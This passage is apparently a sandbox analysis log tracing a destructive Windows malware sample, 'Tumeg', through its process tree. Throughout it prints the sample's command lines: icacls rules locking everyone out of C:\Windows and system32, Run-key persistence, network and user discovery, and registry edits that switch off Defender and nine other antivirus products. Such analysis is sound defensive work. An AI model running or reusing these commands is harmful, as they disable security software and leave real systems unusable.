- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:5000
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:4064
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:5084
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:836
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:4080
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:4408
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:1496
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:3780
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:3264
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:4752
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:2548
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:3388
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:1564
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:3588
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:568
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:3864
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:1232
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:1108
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:3344
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:2308
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:3756
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:1396
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:4692
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:4224
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:3880
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:4188
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:540
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:2164
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "!"
  2⤵
  PID:2204
- C:\Windows\system32\taskkill.exe
  taskkill /f /im notepad.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3404
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows" /deny Everyone:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:4352
- C:\Windows\system32\icacls.exe
  icacls "C:\Program Files" /deny Everyone:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:3732
- C:\Windows\system32\icacls.exe
  icacls "C:\ProgramData" /deny Everyone:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:4824
- C:\Windows\system32\icacls.exe
  icacls "C:\System Volume Information" /deny Everyone:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:1476
- C:\Windows\system32\icacls.exe
  icacls "C:\Recovery" /deny Everyone:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:3636
- C:\Windows\system32\icacls.exe
  icacls "C:\$RECYCLE.BIN" /deny Everyone:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:2612
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\config" /deny Everyone:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:2924
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\system32" /deny Everyone:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:2488
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\system" /deny Everyone:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:1848
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\winsxs" /deny Everyone:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:4392
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\SysWOW64" /deny Everyone:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:4544
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics" /v IconSpacing /t REG_SZ /d -1500 /f
  2⤵
  PID:4796
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics" /v IconVerticalSpacing /t REG_SZ /d -1500 /f
  2⤵
  PID:3076
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics" /v Shell Icon Size /t REG_SZ /d 32 /f
  2⤵
  PID:5108
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics" /v IconFont /t REG_DWORD /d 0 /f
  2⤵
  PID:2284
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 3 /t REG_SZ /d "C:\ProgramData\Microsoft\Device Stage\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\pictures.ico" /f
  2⤵
  - Modifies File Icons
  PID:2380
- C:\Windows\system32\taskkill.exe
  taskkill /f /im explorer.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2956
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Boot or Logon Autostart Execution: Active Setup
  - Enumerates connected drives
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:5056
- C:\Windows\system32\mode.com
  mode con: cols=50 lines=3
  2⤵
  PID:3516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://youtu.be/Ys_F9bsrWkg
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  PID:5060
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x144,0x11c,0x148,0x140,0x14c,0x7ffb79d046f8,0x7ffb79d04708,0x7ffb79d04718
    3⤵
    PID:4428
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,10806108153258688777,5693425653109547071,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
    3⤵
    PID:2304
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,10806108153258688777,5693425653109547071,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3344
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,10806108153258688777,5693425653109547071,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:8
    3⤵
    PID:1964
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,10806108153258688777,5693425653109547071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
    3⤵
    PID:5028
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,10806108153258688777,5693425653109547071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:1
    3⤵
    PID:5072
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,10806108153258688777,5693425653109547071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
    3⤵
    PID:2848
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,10806108153258688777,5693425653109547071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4084 /prefetch:1
    3⤵
    PID:4352
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2172,10806108153258688777,5693425653109547071,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4256 /prefetch:8
    3⤵
    PID:3736
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,10806108153258688777,5693425653109547071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
    3⤵
    PID:2836
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2172,10806108153258688777,5693425653109547071,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5888 /prefetch:8
    3⤵
    PID:3320
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1 -w 1000
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:472
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:4192
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:836
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:1564
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:3728
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:4004
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:1020
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:4352
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:2380
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:2176
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:4828
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:2416
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:4116
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:4792
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:2532
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:4616
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:2380
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:4884
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:4184
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:4576
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:4160
- C:\Windows\system32\sc.exe
  sc config winpeshl start=disabled
  2⤵
  - Launches sc.exe
  PID:4284
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v DisallowWinPELicensing /t REG_DWORD /d 1 /f
  2⤵
  PID:1644
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx" /v "TITLE" /t REG_SZ /d "Tumeg doesn't want to upload your files LOL!" /f
  2⤵
  PID:4616
- C:\Windows\system32\attrib.exe
  attrib +r "C:\ProgramData\Tumeg.exe"
  2⤵
  - Views/modifies file attributes
  PID:1552
- C:\Windows\system32\attrib.exe
  attrib +h "C:\ProgramData\Tumeg.exe"
  2⤵
  - Views/modifies file attributes
  PID:4168
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\links.vbs"
  2⤵
  PID:4408
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=hydra+dragon+antivirus+(rogue+real)
    3⤵
    PID:2284
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x12c,0x130,0x134,0x104,0x138,0x7ffb79d046f8,0x7ffb79d04708,0x7ffb79d04718
      4⤵
      PID:3252
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=free+robux
    3⤵
    PID:2440
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffb79d046f8,0x7ffb79d04708,0x7ffb79d04718
      4⤵
      PID:3612
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2256,8355653496975375400,9119635375034095219,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2268 /prefetch:2
      4⤵
      PID:5140
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2256,8355653496975375400,9119635375034095219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2460 /prefetch:3
      4⤵
      PID:3112
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2256,8355653496975375400,9119635375034095219,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3016 /prefetch:8
      4⤵
      PID:3268
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,8355653496975375400,9119635375034095219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
      4⤵
      PID:2776
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,8355653496975375400,9119635375034095219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
      4⤵
      PID:3208
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2256,8355653496975375400,9119635375034095219,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5232 /prefetch:8
      4⤵
      PID:5428
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2256,8355653496975375400,9119635375034095219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5360 /prefetch:8
      4⤵
      PID:1428
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2256,8355653496975375400,9119635375034095219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5360 /prefetch:8
      4⤵
      PID:5580
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,8355653496975375400,9119635375034095219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1
      4⤵
      PID:5668
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,8355653496975375400,9119635375034095219,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4368 /prefetch:1
      4⤵
      PID:5676
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,8355653496975375400,9119635375034095219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1
      4⤵
      PID:840
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,8355653496975375400,9119635375034095219,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:1
      4⤵
      PID:1360
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,8355653496975375400,9119635375034095219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
      4⤵
      PID:2096
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2256,8355653496975375400,9119635375034095219,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5656 /prefetch:8
      4⤵
      PID:2052
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=how+to+download+windows+12
    3⤵
    PID:3796
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffb79d046f8,0x7ffb79d04708,0x7ffb79d04718
      4⤵
      PID:3244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ipconfig | findstr /C:"IPv4 Address"
  2⤵
  PID:3400
- - C:\Windows\system32\ipconfig.exe
    ipconfig
    3⤵
    - Gathers network information
    PID:4248
- - C:\Windows\system32\findstr.exe
    findstr /C:"IPv4 Address"
    3⤵
    PID:3264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic useraccount where "Name='Admin'" get Caption
  2⤵
  PID:4732
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic useraccount where "Name='Admin'" get Caption
    3⤵
    PID:188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com | find "Address"
  2⤵
  PID:1600
- - C:\Windows\system32\nslookup.exe
    nslookup myip.opendns.com. resolver1.opendns.com
    3⤵
    PID:3776
- - C:\Windows\system32\find.exe
    find "Address"
    3⤵
    PID:2896
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "StartupScript" /t REG_SZ /d "C:\Windows\System32\config\startup2.bat" /f
  2⤵
  PID:4152
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "StartupScript" /t REG_SZ /d "C:\Windows\System32\config\startup3.bat" /f
  2⤵
  PID:1552
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "StartupScript" /t REG_SZ /d "C:\Windows\System32\config\startup4.bat" /f
  2⤵
  PID:4336
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "StartupScript" /t REG_SZ /d "C:\Windows\System32\config\startup5.bat" /f
  2⤵
  PID:5224
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v "AntiVirusOverride" /t REG_DWORD /d "1" /f
  2⤵
  PID:5352
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:5388
- C:\Windows\system32\reg.exe
  reg add "HKEY_CLASSES_ROOT\.cat" /v "Content Type" /t REG_SZ /d "dllhost.exe" /f
  2⤵
  PID:5412
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\AVAST Software\Avast" /v "aswidsagenta" /t REG_DWORD /d "0" /f
  2⤵
  PID:5440
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\AVG" /v "DisableAv" /t REG_DWORD /d "1" /f
  2⤵
  PID:5628
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /v "BlockUserModeAccess" /t REG_DWORD /d "1" /f
  2⤵
  PID:5652
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\McAfee" /v "bDisableSelfProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:5676
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security" /v "ProtectEnabled" /t REG_DWORD /d "0" /f
  2⤵
  PID:5700
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab" /v "Enable" /t REG_DWORD /d "0" /f
  2⤵
  PID:5716
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /v "MalwareProtectionEnabled" /t REG_DWORD /d "0" /f
  2⤵
  PID:5752
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Norton" /v "Enable" /t REG_DWORD /d "0" /f
  2⤵
  PID:5776
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Avira" /v "ProductEnabled" /t REG_DWORD /d "0" /f
  2⤵
  PID:5848
